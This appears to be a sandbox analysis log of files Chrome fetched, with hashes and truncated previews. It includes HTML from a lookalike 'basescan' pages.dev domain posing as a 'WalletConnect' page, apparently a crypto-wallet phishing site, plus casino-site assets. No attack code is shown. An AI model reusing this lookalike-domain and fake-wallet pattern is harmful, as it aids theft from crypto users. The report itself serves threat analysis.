                                                                                                                                                                                                                                              Preview:var N=(l,n,e)=>new Promise((s,i)=>{var p=c=>{try{u(e.next(c))}catch(_){i(_)}},m=c=>{try{u(e.throw(c))}catch(_){i(_)}},u=c=>c.done?s(c.value):Promise.resolve(c.value).then(p,m);u((e=e.apply(l,n)).next())});import{c as $}from"./web-13cf6287.js";import{a9 as v,u as C,aa as t,ab as f,p as A,l as h,t as a,a as r,b as d,ac as S,D as y,h as g}from"./manifest-51a3674f.js";import{t as o}from"./i18n-fcfac1d2.js";import{B as R}from"./index-fc48f31f.js";import{R as I}from"./type-bfb25fc4.js";import{x as O,w as T,s as w}from"./solid-js-38561dfe.js";import{b as k}from"./index-adb8672d.js";import{r as b}from"./index-c1634a5e.js";import"./index-3fd48be3.js";import"./animate-number-f0294c10.js";import"./currency-format-1c532f37.js";import"./_baseGetTag-c2e287b9.js";import"./isArray-79a0be9c.js";import"./index-96ed660e.js";import"./http-f4555b94.js";import"./baseService-449c2e3e.js";import"./_baseFor-3fee30d6.js";import"./_MapCache-1fb5cc44.js";const K=()=>{const l=v(),n=O(T(),C);t("regist-invited-prese
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (15190)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):15191
                                                                                                                                                                                                                                              Entropy (8bit):5.2363316884480335
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:wTeveO2MfWfVfL+R+TtXKAS2OtOKRoul54b2hKnTaGTtjRe5:wTeveO2MeVDtXKASHtOKRoul5QqKTae0
                                                                                                                                                                                                                                              MD5:5F0FD0A2B08E55D03B3863FE5DB68BB3
                                                                                                                                                                                                                                              SHA1:0EE7BD7EA06E26D3F45578CE85BF1E9237C6AD93
                                                                                                                                                                                                                                              SHA-256:4996CDB1B75CE2243F98DF658C8020F5F36034EEE2EB2D43091BC3E4FA935143
                                                                                                                                                                                                                                              SHA-512:40549784BAE4AF11DF7EA603DC8B92B11229C323CE4337EBEFC8944768A5EC9BD6F16E5E87A0AEEEF3DD9F548DD157CD053BC93EB0326586CA6A8D79328A6AA0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var d=(l,_,i)=>new Promise((E,a)=>{var t=s=>{try{n(i.next(s))}catch(r){a(r)}},o=s=>{try{n(i.throw(s))}catch(r){a(r)}},n=s=>s.done?E(s.value):Promise.resolve(s.value).then(t,o);n((i=i.apply(l,_)).next())});const L="modulepreload",v=function(l){return"/modules/lottery2/"+l},m={},e=function(_,i,E){if(!i||i.length===0)return _();const a=document.getElementsByTagName("link");return Promise.all(i.map(t=>{if(t=v(t),t in m)return;m[t]=!0;const o=t.endsWith(".css"),n=o?'[rel="stylesheet"]':"";if(!!E)for(let c=a.length-1;c>=0;c--){const u=a[c];if(u.href===t&&(!o||u.rel==="stylesheet"))return}else if(document.querySelector(`link[href="${t}"]${n}`))return;const r=document.createElement("link");if(r.rel=o?"stylesheet":L,o||(r.as="script",r.crossOrigin=""),r.href=t,document.head.appendChild(r),o)return new Promise((c,u)=>{r.addEventListener("load",c),r.addEventListener("error",()=>u(new Error(`Unable to preload CSS for ${t}`)))})})).then(()=>_()).catch(t=>{const o=new Event("vite:preloadError",{canc
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1155
                                                                                                                                                                                                                                              Entropy (8bit):7.564353338281354
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:3gkVAZ1sIP7qNENmwfRHgdbJaCT2Eqz3rGHzE:3BVU17RvRHglTpiiA
                                                                                                                                                                                                                                              MD5:3D6E7C7D3975FEA27E09222180613F06
                                                                                                                                                                                                                                              SHA1:33C3E6209AD7B026FB655B5D55AAC733D5867182
                                                                                                                                                                                                                                              SHA-256:53B87CA31F7FBE97FAA742965103B0C4078B80B235632508EEFE19205144599D
                                                                                                                                                                                                                                              SHA-512:650F67C10B519DFAC58CACB88F1591E4852C0A9A10478EFD0AAB61FF55622E6AEC4138C40C9A5DE994053CF5EBC59362E37A121AB3AE2F9015F5B590BF01C0A5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.....z..z..z..z..z..z..z..z..z..z..z..z..z..z..z..z..z..z..z..z..z..z..z..z..z..z..z..z..z..z..z..z....................@.....Q..+......w.i.G..%............|.[..7..3..........o.b...........M.. .}..{......8&..... tRNS....s1.M...........~yjB=6.*! ........7IDATx...V.@...I..{...(-..;..._......B&._....M..`T.......g....S...)......]9.E&!..B"./..~..OJ`.;..E.V.". Z.H14)&.I..M.]`.{.-...ai.-..`L1./....|._....._...7._..S..m.y...C[pO...&|.4.}h._.....Q..,..U...h.4cO..f.;<...B....\pG../...^..4..#....>dS*..VED...^.QD..(]$..$....WI.H.....?.. e.3p...$.B...p.C...|3(?..........X.....x..H...x.#.H.GR....!..._.ve?Z....j5*U&.^.u.!..NJw\....T...W....Ju..nm..D....v..N....j6...wG3$..,..p...Lz..sD......W.....Z..,.HY..V..&.\1.i..#...M..E....l......p.wT.\.-.D..U.........[....IC..C.F..f..._..A..{.|U_V...<..\9.....o}.....O...3..j..b1.<.,....+..z.Z.:.d..).......<^..:.d...+..zRQ..mk.6fG4 ..M......<.9.p.....L...p...$."C....?e..WI
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/modules.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):214836
                                                                                                                                                                                                                                              Entropy (8bit):7.996779178051241
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:6144:V/is84j55pc/3xB85UYJbmyXqY15fwrsfKmr+I:VR87782oTEsfr+I
                                                                                                                                                                                                                                              MD5:0E31FC949A00EF0B4E7292FA020DE228
                                                                                                                                                                                                                                              SHA1:91C5557D8BF5AE9BB31656FDAF9AE97B8348282D
                                                                                                                                                                                                                                              SHA-256:5543F2558DA3D995D777D628F71A1A63DDA3AE535FB947AF715D823F274710AF
                                                                                                                                                                                                                                              SHA-512:BF01BD09D7FE116EC18E747386D765374A97042DB5D2790CC11D923E2F79F57DA8125E19221A4EEF2657A9E0B70BCD4C45C3970FDE7E67E89191B5AD4A35F9B3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/casino-9P3_MIUy.png
                                                                                                                                                                                                                                              Preview:RIFF,G..WEBPVP8L.G../?........o...i.qg]Hw....?...G.m5.}...Y.Q....#F.'.A..&..`.......S{.>......V.......R..Fg..8v......s....."..^.Of..R.S...x.G..a.A....NxN..2..4.S.U^.ZF^.r.l..F.i.g......5&i-.....'.3.z............@w....}....RV...{.x.x,b.......Jc.I!. 7..P~.{......6lH.-..!Lk....K..........a.....S. G......`..#v.OB.5..KEVUhy..iQ......,Z....Tz.3.k...V@.)X...5FB...Xhe!.B...F....x..j. ..i.4..+.}V.D.F./.S.(.;.["...G'O.{l..g..f....#.k.I2.Z..id...N..[fh......H..............X.....* .P.l...H...t..yfi..J_*C..%..^..[..h;U.{.....3Z8..e8".....3\...K[C%.(6.a._.=.y.o....N....W...b.........F...?.f"..T..KJc.5.%.8./.:"...z.....[.....Y..u......t^.I....h..+..6.*7Ef..........C......2....8..~.[r.BF.........$IRd..VW.;.......w....?..oX..+........g .........m..V.8N.I....\..J.8O.di[M.;......]%.... $P..r.V..VOrK C..r.{............>......\,...,=N.#....-....[.*.!..y.gEEat.q....DQ.\r~..q.]...p.2..72/....2w.... s....r(..jAf>M..z.....4.&..4....f.v....mZ.]..D@M..M2.HQ..U.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/config.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3169)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):232025
                                                                                                                                                                                                                                              Entropy (8bit):5.550561596070525
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:NhXRLxI5x52A415QyqVho8HMTm8iWCvK4sxgvN3Jx:N6vA5QyqccyhiWCvbv3x
                                                                                                                                                                                                                                              MD5:DAAB01309D35C61F99DE502F4065CB47
                                                                                                                                                                                                                                              SHA1:AE91738763156B7C67CAA4A06664ACFB6525B146
                                                                                                                                                                                                                                              SHA-256:74C48F9E855825D43789761EB642DDC88781553126C8EC5A7FF662F705AFBBF7
                                                                                                                                                                                                                                              SHA-512:08A7AAE12946E08288B7D959075112BA533B85BBC5AD5BFE08A5B68B6D2828556238CBDBAC878F2911AF50AA9DC585A8654C713DF7F0163987CB6B17E5943829
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x1220000, 0xe05, ]);.var aa,ba,ca,da,t,ea,ha,ia,ka;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writabl
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):10042
                                                                                                                                                                                                                                              Entropy (8bit):7.72278713776486
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:+7qoYNMtKwXW+5I/8ASJw0Pf6spz4h7n5MxHPQ9ECx5MlO:QYNg7XORSG036spsh7nPj7
                                                                                                                                                                                                                                              MD5:184C08F39F91434F5291C4C5FC00FFCE
                                                                                                                                                                                                                                              SHA1:23AFBA12CA4D918C7793321E96A940009DE1BD35
                                                                                                                                                                                                                                              SHA-256:EC9DA820D0B9F3520809F54E719AC7F99B5A01717363BBD37C828276EAB304F0
                                                                                                                                                                                                                                              SHA-512:EAF30A2F6E91DC81FFF8DA99C7523421003BCD0587B783EFC6743B2809E2EA30964FE8D4CE03C2A94645940ABFED7B96E892E8CEBAC6DE41A270743790A251BB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/a131ebc530.png?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............F.................<...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (42824)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):42825
                                                                                                                                                                                                                                              Entropy (8bit):4.9651537307862
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:iU1CfxCfLzjlICfL4mCCfLhjCfLKDCfLzjljCfL4dCfLhLCfLKWefLpfQJpd+7uw:h1Cf8nwucf8uq5cSho/odN
                                                                                                                                                                                                                                              MD5:B8E6925257193D93B862DDB73E4D164D
                                                                                                                                                                                                                                              SHA1:09A95815CE720A622E05038E048CD5FF0417DD83
                                                                                                                                                                                                                                              SHA-256:5B5C2F98F02CC4649776756F42AA3CEC6B2FC3721842887034133564B947BCEF
                                                                                                                                                                                                                                              SHA-512:DF3BBB7FFECD2508842D76E394FBB09238FEA2012E43CAEB37B9BDDB2EFF61A1F052F69BC61874A73DD495907FE34D979DAD6B22B88C376DF17A6B840A67A602
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/wr_utils.dist-DvgtdgCy-CUXsbV0Z.js
                                                                                                                                                                                                                                              Preview:var k=async(A={},I)=>{let E;if(I.startsWith("data:")){const g=atob(I.replace(/^data:.*?base64,/,"")),C=new Uint8Array(g.length);for(let D=0;D<g.length;D++)C[D]=g.charCodeAt(D);E=await WebAssembly.instantiate(C,A)}else{const g=await fetch(I),C=g.headers.get("Content-Type")||"";if("instantiateStreaming"in WebAssembly&&C.startsWith("application/wasm"))E=await WebAssembly.instantiateStreaming(g,A);else{const D=await g.arrayBuffer();E=await WebAssembly.instantiate(D,A)}}return E.instance.exports},S=A=>k(A,"data:application/wasm;base64,AGFzbQEAAAABjgEVYAJ/fwF/YAN/f38Bf2ACf38AYAN/f38AYAR/f39/AGABfwBgBX9/f39/AX9gBX9/f39/AGAEf39/fwF/YAF/AX9gAX8BfmAAAGAAAXxgBn9/f39/fwBgBn9/f39/fwF/YAV/f35/fwBgBH9+f38AYAV/f31/fwBgBH99f38AYAV/f3x/fwBgBH98f38AAlMCEC4vd3JfdXRpbHNfYmcuanMaX193Ymdfbm93XzljNTk5MGJkYTA0YzdlNTMADBAuL3dyX3V0aWxzX2JnLmpzEF9fd2JpbmRnZW5fdGhyb3cAAgNiYQMCAQACAwYBBgIDAAcDBAMAAwcDAwIHBAQABAIAAAUDBAQCAgYNAAACBQMBAQULAgYAAggCAgUOBw8RBhMEBQEFAwgDAAAAAAACAAMAAAMCAAkACwMCAQEBAAkACQoKCgUEBQFwATQ0BQMB
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (18802)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):18825
                                                                                                                                                                                                                                              Entropy (8bit):4.978677896920501
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:HDD130L01xZzveV2SV27uZRhC9XOmo221cY5cYWZdCg46fG5GRhrh5zc8C7yryF:jD1ZzvifxhC9dYSYOEa95z4yGF
                                                                                                                                                                                                                                              MD5:7E297ADA79115780DFA7124B3321DC50
                                                                                                                                                                                                                                              SHA1:9DB69AA6387703011C1BB114F1559D24075F0FB3
                                                                                                                                                                                                                                              SHA-256:EBDFE85826B09CAAD8A42D9BC4EEB78665DAFF9CB4B780473483204F16FEABE7
                                                                                                                                                                                                                                              SHA-512:5D51D3757892B730D885A4CF00BC137044CC9E8D0E9A66C92444C8BD96F0083A2335CB0335DD4B0B3292185ECE95ABA0EC49BB49B84E4FB3B550153035EFC691
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const e="Active",t="All",a="Canceled",o="Clear",r="Closed",i="Confirm",s="Copied",n="Copy",l="Details",c="Discount",u="Drawing",y="Draws",d="Expired",h="From",m="LOTTERY",w="Less",b="Lottery",k="You received __quantity__ free lottery ticket",p="The lottery results are in! Take a look of your winnings.",f="You have __quantity__ updates from Lottery",g="Match",_="Matches",T="Missed",v="More",L="Numbers",S="OFF",D="Odds",N="Past",C="Payout",B="Pending",P="Player",R="Popular",E="Prize",A="Profit",W="Rebet",M="Redeemed",I="Results",O="Rewards",x="Settled",Y="Status",F="Ticket",G="Tickets",V="Total",H="Verify",z="View",U="Win",J="cancelled",q="custom",j="ticket",$={"*This link is available for 24 hours from the time of generation. If the link is not used within this time frame, the amount you paid will be refunded to your wallet.":"*This link is available for 24 hours from the time of generation. If the link is not used within this time frame, the amount you paid will be refunded to your wal
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (400), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):400
                                                                                                                                                                                                                                              Entropy (8bit):4.6947063372394835
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:KckvFrWX0s0s0s0s0s0s0s0s1PAQUGam6SfVVVVVVVVmn:KckcAQUU6Sun
                                                                                                                                                                                                                                              MD5:E54BD01FE44C2E722DDBDA48DD83CE0F
                                                                                                                                                                                                                                              SHA1:14EA68199522855C1B3AE8842E66D8437D7D3292
                                                                                                                                                                                                                                              SHA-256:40B352DCB0B9B4F3DE30C7218E08BBF044E130A54309B851E2112A2D64CB0E0E
                                                                                                                                                                                                                                              SHA-512:4324BE16AB36B5B06C96E616652B7DE2DDB9A8C63C59E64A834988AA1E88EF58546466E828D75FEF76AF39A73128099B7A747BD97C7CE31A4722F462BDB40976
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISeQlPLULTHrNMzRIFDRppjN8SBQ09H1M8EgUNWrHXEBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDTHlL_4SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SFwlliF59AADj3BIFDRppjN8SBQ09H1M8EhAJQQnSEmcErloSBQ1asdcQEh4JWgTXv1i4Y2QSBQ3BobYcEgUNwaG2HBIFDcGhthwSTwnjpyY1BVI-LRIFDTHlL_4SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8=?alt=proto
                                                                                                                                                                                                                                              Preview:CpABCgcNGmmM3xoACgcNPR9TPBoACgcNWrHXEBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNMeUv/hoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoAChIKBw0aaYzfGgAKBw09H1M8GgAKCQoHDVqx1xAaAAobCgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACloKBw0x5S/+GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgA=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):11496
                                                                                                                                                                                                                                              Entropy (8bit):7.9808062488034075
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:qBZALACEj9jRg6q5g8rU77XGJx+w3HXyTJczzqlLOCSZj:QZAURj9ji6+gooWJgw3k3lLOXZj
                                                                                                                                                                                                                                              MD5:ACE39F61513973943A3ECEE64C2DD6F5
                                                                                                                                                                                                                                              SHA1:883403DAF7712E55B56A2D11565550550A3540CC
                                                                                                                                                                                                                                              SHA-256:9FD70585505EFFC5E2BBAC35B2E55BBF5735EC6F8CEDFED17096D444538CFFFF
                                                                                                                                                                                                                                              SHA-512:61F9C1E9F870B95565F6CA14EE7B29BB1DF876810AFD3634631A9B45304BAB17DE2B3B03A1DA79964DE82EE5A1606404C303C018B132B98905DADB6AB1861809
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/init/init.png
                                                                                                                                                                                                                                              Preview:RIFF.,..WEBPVP8L.,../f.Y..............3S:..Cw....H...md.....i.}t/....fL..#[.c[{..W$9.T.3O5.v.Y.-.+f..?.H.&..S.....]L.%0.S.-.SG..^..gMD6I..O....\F.F.....>.c.9..R./.$..RMJ.E..&..!bB..A.g.PdX..jN5VM..h........@.......@.0.H...l ..WG.....@b.Ec.K.&.3Fj...p....)..0(.VS.v.V..c.....x.2..,F#.O...d.h.....W/GQ.@...W.......LoS..&.S..W..,.6....6.."h.P.....z.".j.fVUY,...qMq....N......E..JD...%..A/...QEOS..!..$.Hb.&J.U.U......bZ.q..6..1f.j...s..E.[f.....o.".GY...z..al..;.\+..8.k.[SMB...8..`<..T4"[.,..d_.y.TAOt./.....Ga.tL.G.........s.......!..E.&1@1 1@1@_o....L.n..?w...W"}.[...T......GK...u/.....=.}x......s....Yr....A...)....W...~..:...Mdz....a.......yS...q..m..v...I...1.z..".....}..s..d.N"...I...hi.....33..i..q.!.%...]..........S..........?.....+.V..=.H.6....e.NUK..T.....NU.....L"./...m.2....)Z...Y...m...........%k...Sh..Q..ta..`....73.....2...#.Kr..gD.a..U.9.....4..m.}......m.....mh{2....Kv.8..8.%.I....F.N...9.a.K..X...d...?... I.i.p..W.....R....$.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2891)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2892
                                                                                                                                                                                                                                              Entropy (8bit):5.097546923267263
                                                                                                                                                                                                                                              Encrypted:false
